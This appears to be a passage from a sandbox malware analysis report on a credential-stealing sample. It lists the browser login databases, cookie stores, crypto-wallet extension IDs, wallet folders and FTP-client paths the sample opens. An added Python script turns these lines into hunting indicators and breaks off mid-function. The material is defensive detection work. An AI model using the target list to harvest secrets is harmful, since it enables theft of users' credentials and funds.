                Source: JqGBbm7.exe, 00000000.00000003.1759629623.0000000000DF1000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: %appdata%\ElectronCash\wallets
                Source: JqGBbm7.exe, 00000000.00000003.1796984446.0000000000DF1000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: window-state.json
                Source: JqGBbm7.exe, 00000000.00000003.1770760646.0000000000E38000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: enllpjcblmjkfcffne","ez":"Jaxx Liberty"},{"en":"fihkakfobkmkjojpchpfgcmhfjnm
                Source: JqGBbm7.exe, 00000000.00000003.1759629623.0000000000DF1000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: %appdata%\Exodus\exodus.wallet
                Source: JqGBbm7.exe, 00000000.00000003.1740924328.00000000056E9000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: ExodusWeb3[
                Source: JqGBbm7.exe, 00000000.00000003.1796984446.0000000000DF1000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: %appdata%\Ethereum
                Source: JqGBbm7.exe, 00000000.00000003.1759629623.0000000000DF1000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: %localappdata%\Coinomi\Coinomi\wallets
                Source: JqGBbm7.exe, 00000000.00000003.1760067727.0000000000DBD000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: keystore
                Source: C:\Users\user\Desktop\JqGBbm7.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
                Source: C:\Users\user\Desktop\JqGBbm7.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnm
                Source: C:\Users\user\Desktop\JqGBbm7.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajb
                Source: C:\Users\user\Desktop\JqGBbm7.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappafln
                Source: C:\Users\user\Desktop\JqGBbm7.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                Source: C:\Users\user\Desktop\JqGBbm7.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                Source: C:\Users\user\Desktop\JqGBbm7.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm
                Source: C:\Users\user\Desktop\JqGBbm7.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafa
                Source: C:\Users\user\Desktop\JqGBbm7.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.js
                Source: C:\Users\user\Desktop\JqGBbm7.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdo
                Source: C:\Users\user\Desktop\JqGBbm7.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopg
                Source: C:\Users\user\Desktop\JqGBbm7.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoa
                Source: C:\Users\user\Desktop\JqGBbm7.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdph
                Source: C:\Users\user\Desktop\JqGBbm7.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkld
                Source: C:\Users\user\Desktop\JqGBbm7.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolaf
                Source: C:\Users\user\Desktop\JqGBbm7.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddfffla
                Source: C:\Users\user\Desktop\JqGBbm7.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnid
                Source: C:\Users\user\Desktop\JqGBbm7.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfci
                Source: C:\Users\user\Desktop\JqGBbm7.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjeh
                Source: C:\Users\user\Desktop\JqGBbm7.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemg
                Source: C:\Users\user\Desktop\JqGBbm7.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhae
                Source: C:\Users\user\Desktop\JqGBbm7.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\key4.db
                Source: C:\Users\user\Desktop\JqGBbm7.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliof
                Source: C:\Users\user\Desktop\JqGBbm7.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec
                Source: C:\Users\user\Desktop\JqGBbm7.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmon
                Source: C:\Users\user\Desktop\JqGBbm7.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhm
                Source: C:\Users\user\Desktop\JqGBbm7.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcm
                Source: C:\Users\user\Desktop\JqGBbm7.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcob
                Source: C:\Users\user\Desktop\JqGBbm7.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjh
                Source: C:\Users\user\Desktop\JqGBbm7.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\abogmiocnneedmmepnohnhlijcjpcifd
                Source: C:\Users\user\Desktop\JqGBbm7.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflc
                Source: C:\Users\user\Desktop\JqGBbm7.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbg
                Source: C:\Users\user\Desktop\JqGBbm7.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
                Source: C:\Users\user\Desktop\JqGBbm7.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahd
                Source: C:\Users\user\Desktop\JqGBbm7.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhk
                Source: C:\Users\user\Desktop\JqGBbm7.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbai
                Source: C:\Users\user\Desktop\JqGBbm7.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
                Source: C:\Users\user\Desktop\JqGBbm7.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgn
                Source: C:\Users\user\Desktop\JqGBbm7.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpi
                Source: C:\Users\user\Desktop\JqGBbm7.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite
                Source: C:\Users\user\Desktop\JqGBbm7.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifb
                Source: C:\Users\user\Desktop\JqGBbm7.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgk
                Source: C:\Users\user\Desktop\JqGBbm7.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbai
                Source: C:\Users\user\Desktop\JqGBbm7.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkd
                Source: C:\Users\user\Desktop\JqGBbm7.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account
                Source: C:\Users\user\Desktop\JqGBbm7.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimn
                Source: C:\Users\user\Desktop\JqGBbm7.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfj
                Source: C:\Users\user\Desktop\JqGBbm7.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohao
                Source: C:\Users\user\Desktop\JqGBbm7.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For Account
                Source: C:\Users\user\Desktop\JqGBbm7.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjk
                Source: C:\Users\user\Desktop\JqGBbm7.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnf
                Source: C:\Users\user\Desktop\JqGBbm7.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofec
                Source: C:\Users\user\Desktop\JqGBbm7.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihd
                Source: C:\Users\user\Desktop\JqGBbm7.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcje
                Source: C:\Users\user\Desktop\JqGBbm7.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaoc
                Source: C:\Users\user\Desktop\JqGBbm7.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdno
                Source: C:\Users\user\Desktop\JqGBbm7.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdaf
                Source: C:\Users\user\Desktop\JqGBbm7.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cert9.db
                Source: C:\Users\user\Desktop\JqGBbm7.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkm
                Source: C:\Users\user\Desktop\JqGBbm7.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\formhistory.sqlite
                Source: C:\Users\user\Desktop\JqGBbm7.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbic
                Source: C:\Users\user\Desktop\JqGBbm7.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoadd
                Source: C:\Users\user\Desktop\JqGBbm7.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhi
                Source: C:\Users\user\Desktop\JqGBbm7.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeap
                Source: C:\Users\user\Desktop\JqGBbm7.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihoh
                Source: C:\Users\user\Desktop\JqGBbm7.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpa
                Source: C:\Users\user\Desktop\JqGBbm7.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbn
                Source: C:\Users\user\Desktop\JqGBbm7.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaad
                Source: C:\Users\user\Desktop\JqGBbm7.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\logins.json
                Source: C:\Users\user\Desktop\JqGBbm7.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilc
                Source: C:\Users\user\Desktop\JqGBbm7.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclg
                Source: C:\Users\user\Desktop\JqGBbm7.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoa
                Source: C:\Users\user\Desktop\JqGBbm7.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchh
                Source: C:\Users\user\Desktop\JqGBbm7.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
                Source: C:\Users\user\Desktop\JqGBbm7.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn
                Source: C:\Users\user\Desktop\JqGBbm7.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfdd
                Source: C:\Users\user\Desktop\JqGBbm7.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpak
                Source: C:\Users\user\Desktop\JqGBbm7.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjp
                Source: C:\Users\user\Desktop\JqGBbm7.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpo
                Source: C:\Users\user\Desktop\JqGBbm7.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgpp
                Source: C:\Users\user\Desktop\JqGBbm7.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite
                Source: C:\Users\user\Desktop\JqGBbm7.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles
                Source: C:\Users\user\Desktop\JqGBbm7.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblb
                Source: C:\Users\user\Desktop\JqGBbm7.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbch
                Source: C:\Users\user\Desktop\JqGBbm7.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbm
                Source: C:\Users\user\Desktop\JqGBbm7.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbch
                Source: C:\Users\user\Desktop\JqGBbm7.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfe
                Source: C:\Users\user\Desktop\JqGBbm7.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmj
                Source: C:\Users\user\Desktop\JqGBbm7.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffne
                Source: C:\Users\user\Desktop\JqGBbm7.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklk
                Source: C:\Users\user\Desktop\JqGBbm7.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdma
                Source: C:\Users\user\Desktop\JqGBbm7.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdil
                Source: C:\Users\user\Desktop\JqGBbm7.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapac
                Source: C:\Users\user\Desktop\JqGBbm7.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnkno
                Source: C:\Users\user\Desktop\JqGBbm7.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimig
                Source: C:\Users\user\Desktop\JqGBbm7.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncg
                Source: C:\Users\user\Desktop\JqGBbm7.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolb
                Source: C:\Users\user\Desktop\JqGBbm7.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcob
                Source: C:\Users\user\Desktop\JqGBbm7.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnba
                Source: C:\Users\user\Desktop\JqGBbm7.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddfffla
                Source: C:\Users\user\Desktop\JqGBbm7.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjih
                Source: C:\Users\user\Desktop\JqGBbm7.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcge
                Source: C:\Users\user\Desktop\JqGBbm7.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgik
                Source: C:\Users\user\Desktop\JqGBbm7.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhad
                Source: C:\Users\user\Desktop\JqGBbm7.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgef
                Source: C:\Users\user\Desktop\JqGBbm7.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbb
                Source: C:\Users\user\Desktop\JqGBbm7.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
                Source: C:\Users\user\Desktop\JqGBbm7.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkp
                Source: C:\Users\user\Desktop\JqGBbm7.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcellj
                Source: C:\Users\user\Desktop\JqGBbm7.exe | File opened: C:\Users\user\AppData\Roaming\FTPGetter
                Source: C:\Users\user\Desktop\JqGBbm7.exe | File opened: C:\Users\user\AppData\Roaming\FTPInfo
                Source: C:\Users\user\Desktop\JqGBbm7.exe | File opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites
                Source: C:\Users\user\Desktop\JqGBbm7.exe | File opened: C:\Users\user\AppData\Roaming\FTPbox
                Source: C:\Users\user\Desktop\JqGBbm7.exe | File opened: C:\Users\user\AppData\Roaming\FTPRush
                Source: C:\Users\user\Desktop\JqGBbm7.exe | File opened: C:\Users\user\AppData\Roaming\Conceptworld\Notezilla
                Source: C:\Users\user\Desktop\JqGBbm7.exe | File opened: C:\ProgramData\SiteDesigner\3D-FTP
                Source: C:\Users\user\Desktop\JqGBbm7.exe | File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
                Source: C:\Users\user\Desktop\JqGBbm7.exe | File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
                Source: C:\Users\user\Desktop\JqGBbm7.exe | File opened: C:\Users\user\AppData\Roaming\Ledger Live
                Source: C:\Users\user\Desktop\JqGBbm7.exe | File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb
                Source: C:\Users\user\Desktop\JqGBbm7.exe | File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
                Source: C:\Users\user\Desktop\JqGBbm7.exe | File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
                Source: C:\Users\user\Desktop\JqGBbm7.exe | File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets
                Source: C:\Users\user\Desktop\JqGBbm7.exe | File opened: C:\Users\user\AppData\Roaming\Binance
                Source: C:\Users\user\Desktop\JqGBbm7.exe | File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB
                Source: C:\Users\user\Desktop\JqGBbm7.exe | File opened: C:\Users\user\AppData\Roaming\Electrum\wallets
                Source: C:\Users\user\Desktop\JqGBbm7.exe | File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets
                Source: C:\Users\user\Desktop\JqGBbm7.exe | File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB
                Source: C:\Users\user\Desktop\JqGBbm7.exe | Directory queried: C:\Users\user\Documents
                Source: C:\Users\user\Desktop\JqGBbm7.exe | Directory queried: C:\Users\user\Documents
                Source: C:\Users\user\Desktop\JqGBbm7.exe | Directory queried: C:\Users\user\Documents\BPMLNOBVSB
                Source: C:\Users\user\Desktop\JqGBbm7.exe | Directory queried: C:\Users\user\Documents\BPMLNOBVSB
                Source: C:\Users\user\Desktop\JqGBbm7.exe | Directory queried: C:\Users\user\Documents\UOOJJOZIRH
                Source: C:\Users\user\Desktop\JqGBbm7.exe | Directory queried: C:\Users\user\Documents\UOOJJOZIRH
                Source: C:\Users\user\Desktop\JqGBbm7.exe | Directory queried: C:\Users\user\Documents
                Source: C:\Users\user\Desktop\JqGBbm7.exe | Directory queried: C:\Users\user\Documents
                Source: Yara match | File source: 00000000.00000003.1759629623.0000000000DF1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000000.00000003.1770818531.0000000000DF1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: Process Memory Space: JqGBbm7.exe PID: 7280, type: MEMORYSTR
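The behaviour lines in the Anti Debugging section (window-class probes for OllyDbg and the Sysinternals monitors, CreateFile on the SICE/NTICE/SIWVID device names) and in this section (reads of browser credential stores, of `Local Extension Settings\<id>` directories, of wallet and FTP-client folders) are useful beyond this one sample only once they are turned into host-independent indicators. The script below is an added example, not part of the Joe Sandbox report and not code from the sample; it parses such lines, accepts both the separated form used above and the raw exported form with the `Source:` prefix and trailing `Jump to behavior` text, and groups what it finds into indicator classes with the sandbox user name generalised to `C:\Users\*`. The input lines are a constructed, re-typed subset of this report; the indicator-class names, the helper names and the marker lists are assumptions made for the example. The extension-ID labels are limited to two IDs: MetaMask's public Chrome Web Store ID, and the Jaxx Liberty ID that the sample's own configuration string above pairs with that name.

```python
"""Turn Joe Sandbox behaviour lines into hunting indicators (added example, not report code)."""
import re
from collections import defaultdict

# Constructed, re-typed subset of this report's behaviour lines so the script runs offline.
SAMPLE_LINES = [
    r"C:\Users\user\Desktop\JqGBbm7.exe | Open window title or class name: ollydbg",
    r"C:\Users\user\Desktop\JqGBbm7.exe | Open window title or class name: procmon_window_class",
    r"C:\Users\user\Desktop\JqGBbm7.exe | File opened: SICE",
    r"C:\Users\user\Desktop\JqGBbm7.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data",
    r"C:\Users\user\Desktop\JqGBbm7.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn",
    r"C:\Users\user\Desktop\JqGBbm7.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbai",
    r"C:\Users\user\Desktop\JqGBbm7.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbai",
    r"C:\Users\user\Desktop\JqGBbm7.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\key4.db",
    r"C:\Users\user\Desktop\JqGBbm7.exe | File opened: C:\Users\user\AppData\Roaming\Electrum\wallets",
    r"C:\Users\user\Desktop\JqGBbm7.exe | File opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites",
    r"C:\Users\user\Desktop\JqGBbm7.exe | Directory queried: C:\Users\user\Documents",
    # The same kind of line in the raw exported form (fused source, trailing link text):
    r"Source: C:\Users\user\Desktop\JqGBbm7.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior",
]

# Lazy "src" stops at the first signature keyword, so the fused form parses too.
LINE_RE = re.compile(
    r"^\s*(?:Source:\s*)?(?P<src>.+?)\s*\|?\s*"
    r"(?P<kind>File opened|Open window title or class name|Directory queried):\s*"
    r"(?P<val>.+?)\s*(?:Jump to behavior)?\s*$"
)
# Chrome extension IDs are 32 letters a-p; the report also shows a few 31-character IDs, kept as-is.
EXT_RE = re.compile(r"(?:Local|Sync) Extension Settings\\([a-p]{31,32})$")
USER_RE = re.compile(r"^[A-Za-z]:\\Users\\[^\\]+")

DEBUGGER_DEVICES = {"SICE", "NTICE", "SIWVID"}  # SoftICE-era device names opened via CreateFile
BROWSER_STORES = {  # basenames of credential/session stores seen in the report
    "Login Data", "Login Data For Account", "Web Data", "Cookies", "History",
    "key4.db", "cert9.db", "logins.json", "cookies.sqlite", "places.sqlite",
    "formhistory.sqlite", "prefs.js",
}
WALLET_MARKERS = ("Electrum", "Exodus", "Coinomi", "Ledger Live", "\\atomic\\",
                  "Bitcoin", "Binance", "com.liberty.jaxx", "Guarda")
FTP_MARKERS = ("FTPGetter", "FTPInfo", "SmartFTP", "FTPbox", "FTPRush", "3D-FTP")
KNOWN_EXTENSIONS = {  # assumption: only two IDs we can name with certainty
    "nkbihfbeogaeaoehlefnkodbefgpgknn": "MetaMask",      # public Chrome Web Store ID
    "cjelfplplebdjjenllpjcblmjkfcffne": "Jaxx Liberty",  # named in the sample's own config string
}


def generalize_user_path(path):
    """Replace the sandbox user name so the path works as a hunting glob on any host."""
    return USER_RE.sub(lambda m: m.group(0)[:2] + r"\Users\*", path)


def classify(kind, value):
    """Map one behaviour line to (indicator class, normalised value)."""
    if kind == "Open window title or class name":
        return "analysis_tool_window", value.lower()
    if kind == "Directory queried":
        return "directory_listing", generalize_user_path(value)
    if value in DEBUGGER_DEVICES:
        return "debugger_device", value
    m = EXT_RE.search(value)
    if m:
        return "browser_extension_id", m.group(1)
    basename = value.rsplit("\\", 1)[-1]
    if basename in BROWSER_STORES:
        return "browser_credential_store", generalize_user_path(value)
    if any(mk in value for mk in WALLET_MARKERS):
        return "wallet_path", generalize_user_path(value)
    if any(mk in value for mk in FTP_MARKERS):
        return "ftp_client_path", generalize_user_path(value)
    return "other_path", generalize_user_path(value)


def build_indicators(lines):
    """Return ({indicator class: sorted unique values}, number of unparsable lines)."""
    found = defaultdict(set)
    skipped = 0
    for line in lines:
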